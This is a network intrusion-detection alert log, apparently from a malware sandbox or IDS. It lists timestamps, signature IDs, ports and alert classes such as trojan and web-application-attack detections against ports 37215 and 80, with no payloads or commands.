              Timestamp:06/10/24-15:37:59.968007
              SID:2829579
              Source Port:58160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.000374
              SID:2829579
              Source Port:42520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.301885
              SID:2030092
              Source Port:41090
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.650127
              SID:2835222
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.704450
              SID:2829579
              Source Port:40856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.725896
              SID:2835222
              Source Port:50012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.133348
              SID:2030092
              Source Port:50348
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.224996
              SID:2835222
              Source Port:55062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.494522
              SID:2835222
              Source Port:39212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.262402
              SID:2030092
              Source Port:34602
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.087778
              SID:2030092
              Source Port:46684
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.161006
              SID:2030092
              Source Port:60032
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.173963
              SID:2030092
              Source Port:48168
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.941006
              SID:2835222
              Source Port:33514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.319024
              SID:2030092
              Source Port:52686
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.148491
              SID:2030092
              Source Port:53442
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.213967
              SID:2835222
              Source Port:58106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.170905
              SID:2030092
              Source Port:57200
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.014911
              SID:2829579
              Source Port:38984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.490299
              SID:2835222
              Source Port:54648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.257346
              SID:2835222
              Source Port:32950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.143761
              SID:2030092
              Source Port:50320
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.719824
              SID:2835222
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.653315
              SID:2835222
              Source Port:57296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.978246
              SID:2829579
              Source Port:60256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.975667
              SID:2829579
              Source Port:36530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.858288
              SID:2835222
              Source Port:49962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.985167
              SID:2835222
              Source Port:57818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.324002
              SID:2030092
              Source Port:44934
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.007220
              SID:2835222
              Source Port:53538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.503623
              SID:2835222
              Source Port:36608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.488251
              SID:2829579
              Source Port:33812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.741975
              SID:2829579
              Source Port:53950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.642678
              SID:2829579
              Source Port:41888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.745869
              SID:2025883
              Source Port:37862
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.131221
              SID:2835222
              Source Port:48102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.214768
              SID:2829579
              Source Port:50926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.933795
              SID:2835222
              Source Port:52838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.251690
              SID:2835222
              Source Port:51740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.014210
              SID:2829579
              Source Port:56360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.667443
              SID:2829579
              Source Port:56504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.166379
              SID:2030092
              Source Port:54382
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.756001
              SID:2030092
              Source Port:53434
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.846884
              SID:2829579
              Source Port:53768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.110350
              SID:2030092
              Source Port:37622
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.692312
              SID:2835222
              Source Port:55186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.194715
              SID:2829579
              Source Port:37402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.227634
              SID:2835222
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.229897
              SID:2030092
              Source Port:56566
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.675728
              SID:2835222
              Source Port:33814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.015623
              SID:2829579
              Source Port:40590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.119966
              SID:2030092
              Source Port:38652
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.639134
              SID:2835222
              Source Port:37932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.680398
              SID:2829579
              Source Port:39902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.957760
              SID:2835222
              Source Port:51050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.270070
              SID:2835222
              Source Port:33262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.748143
              SID:2835222
              Source Port:48954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.821238
              SID:2835222
              Source Port:32890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.096951
              SID:2030092
              Source Port:44218
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.663241
              SID:2829579
              Source Port:54254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.200487
              SID:2829579
              Source Port:38990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.218890
              SID:2829579
              Source Port:47364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.182265
              SID:2835222
              Source Port:34830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.908641
              SID:2835222
              Source Port:58970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.761061
              SID:2829579
              Source Port:36230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.089268
              SID:2025883
              Source Port:40248
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.716092
              SID:2835222
              Source Port:42970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.785256
              SID:2829579
              Source Port:60856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.749574
              SID:2835222
              Source Port:45224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.729371
              SID:2829579
              Source Port:60038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.083879
              SID:2030092
              Source Port:45866
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.870630
              SID:2835222
              Source Port:56808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.963760
              SID:2835222
              Source Port:46788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.860487
              SID:2835222
              Source Port:44080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.250289
              SID:2829579
              Source Port:58062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.673517
              SID:2829579
              Source Port:38196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.956134
              SID:2835222
              Source Port:38414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.202496
              SID:2030092
              Source Port:47442
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.867470
              SID:2030092
              Source Port:49412
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.643438
              SID:2829579
              Source Port:54252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.828946
              SID:2835222
              Source Port:55338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.207478
              SID:2829579
              Source Port:59202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.837956
              SID:2835222
              Source Port:51482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.133538
              SID:2829579
              Source Port:35252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.829282
              SID:2025883
              Source Port:35066
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.951337
              SID:2829579
              Source Port:38428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.927927
              SID:2835222
              Source Port:41114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.656592
              SID:2835222
              Source Port:34154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.242403
              SID:2030092
              Source Port:53060
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.922412
              SID:2829579
              Source Port:49110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.937775
              SID:2829579
              Source Port:51088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.189767
              SID:2030092
              Source Port:51664
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.996136
              SID:2835222
              Source Port:60446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.241022
              SID:2030092
              Source Port:55470
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.316251
              SID:2030092
              Source Port:33330
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.701067
              SID:2835222
              Source Port:35468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.025563
              SID:2829579
              Source Port:40448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.797691
              SID:2030092
              Source Port:39842
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.658653
              SID:2829579
              Source Port:58346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.037730
              SID:2829579
              Source Port:50096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.959524
              SID:2835222
              Source Port:47272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.863237
              SID:2829579
              Source Port:37642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.171881
              SID:2835222
              Source Port:37844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.717243
              SID:2829579
              Source Port:37456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.024162
              SID:2835222
              Source Port:52364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.252101
              SID:2030092
              Source Port:39716
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.162773
              SID:2030092
              Source Port:35750
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.251453
              SID:2030092
              Source Port:42358
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.313323
              SID:2030092
              Source Port:34228
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.237158
              SID:2835222
              Source Port:42124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.245474
              SID:2829579
              Source Port:43920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.682611
              SID:2835222
              Source Port:53394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.191670
              SID:2030092
              Source Port:55284
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.711502
              SID:2829579
              Source Port:56870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.498786
              SID:2835222
              Source Port:47358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.946836
              SID:2835222
              Source Port:53482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.641252
              SID:2829579
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.032756
              SID:2829579
              Source Port:42506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.244658
              SID:2835222
              Source Port:47540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.152274
              SID:2030092
              Source Port:48888
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.871465
              SID:2835222
              Source Port:38466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.019152
              SID:2829579
              Source Port:57320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.509056
              SID:2835222
              Source Port:43224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.860897
              SID:2025883
              Source Port:56400
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.793177
              SID:2025883
              Source Port:52842
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.699989
              SID:2829579
              Source Port:56932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.494045
              SID:2835222
              Source Port:35882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.216411
              SID:2829579
              Source Port:34482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.086431
              SID:2030092
              Source Port:35036
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.850206
              SID:2835222
              Source Port:40532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.961213
              SID:2829579
              Source Port:42564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.128087
              SID:2030092
              Source Port:37282
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.917908
              SID:2835222
              Source Port:47136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.772411
              SID:2835222
              Source Port:43048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.827151
              SID:2025883
              Source Port:51382
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.822383
              SID:2835222
              Source Port:44278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.512532
              SID:2829579
              Source Port:34816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.909928
              SID:2829579
              Source Port:54426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.236295
              SID:2835222
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.858870
              SID:2025883
              Source Port:34410
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.035608
              SID:2835222
              Source Port:41890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.156695
              SID:2030092
              Source Port:57996
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.849196
              SID:2829579
              Source Port:41440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.762945
              SID:2030092
              Source Port:50134
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.223242
              SID:2835222
              Source Port:50042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.143166
              SID:2030092
              Source Port:48458
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.167637
              SID:2030092
              Source Port:39078
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.488251
              SID:2835222
              Source Port:33812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.927028
              SID:2835222
              Source Port:33064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.038461
              SID:2829579
              Source Port:51092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.122707
              SID:2030092
              Source Port:47044
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.511832
              SID:2829579
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.774996
              SID:2835222
              Source Port:39138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.840660
              SID:2025883
              Source Port:33900
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.083314
              SID:2025883
              Source Port:35834
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.954562
              SID:2829579
              Source Port:33990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.767523
              SID:2025883
              Source Port:60126
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.998646
              SID:2835222
              Source Port:59662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.495196
              SID:2829579
              Source Port:51876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.825900
              SID:2835222
              Source Port:56588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.971341
              SID:2835222
              Source Port:47258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.224996
              SID:2829579
              Source Port:55062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.208229
              SID:2829579
              Source Port:58864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.236059
              SID:2030092
              Source Port:56122
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.240544
              SID:2835222
              Source Port:39526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.926997
              SID:2829579
              Source Port:42424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.127508
              SID:2030092
              Source Port:36034
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.979940
              SID:2829579
              Source Port:35362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.271532
              SID:2829579
              Source Port:51048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.137618
              SID:2030092
              Source Port:57064
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.238179
              SID:2030092
              Source Port:51116
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.823755
              SID:2835222
              Source Port:39666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.156095
              SID:2030092
              Source Port:35272
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.180786
              SID:2030092
              Source Port:34516
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.134301
              SID:2829579
              Source Port:45440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.672216
              SID:2829579
              Source Port:38730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.758344
              SID:2835222
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.928827
              SID:2835222
              Source Port:45682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.854671
              SID:2829579
              Source Port:60760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.274773
              SID:2829579
              Source Port:34678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.272286
              SID:2835222
              Source Port:38538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.172142
              SID:2030092
              Source Port:53184
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.968007
              SID:2835222
              Source Port:58160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.750933
              SID:2025883
              Source Port:35674
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.647206
              SID:2835222
              Source Port:39070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.985167
              SID:2829579
              Source Port:57818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.263818
              SID:2829579
              Source Port:45736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.707896
              SID:2835222
              Source Port:52190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.132023
              SID:2829579
              Source Port:43292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.135826
              SID:2030092
              Source Port:45424
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.992906
              SID:2835222
              Source Port:33394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.814855
              SID:2829579
              Source Port:35140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.191721
              SID:2829579
              Source Port:48406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.016307
              SID:2829579
              Source Port:60502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.500887
              SID:2835222
              Source Port:34050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.651590
              SID:2829579
              Source Port:45096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.260853
              SID:2829579
              Source Port:44940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.166755
              SID:2829579
              Source Port:34632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.877070
              SID:2835222
              Source Port:54630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
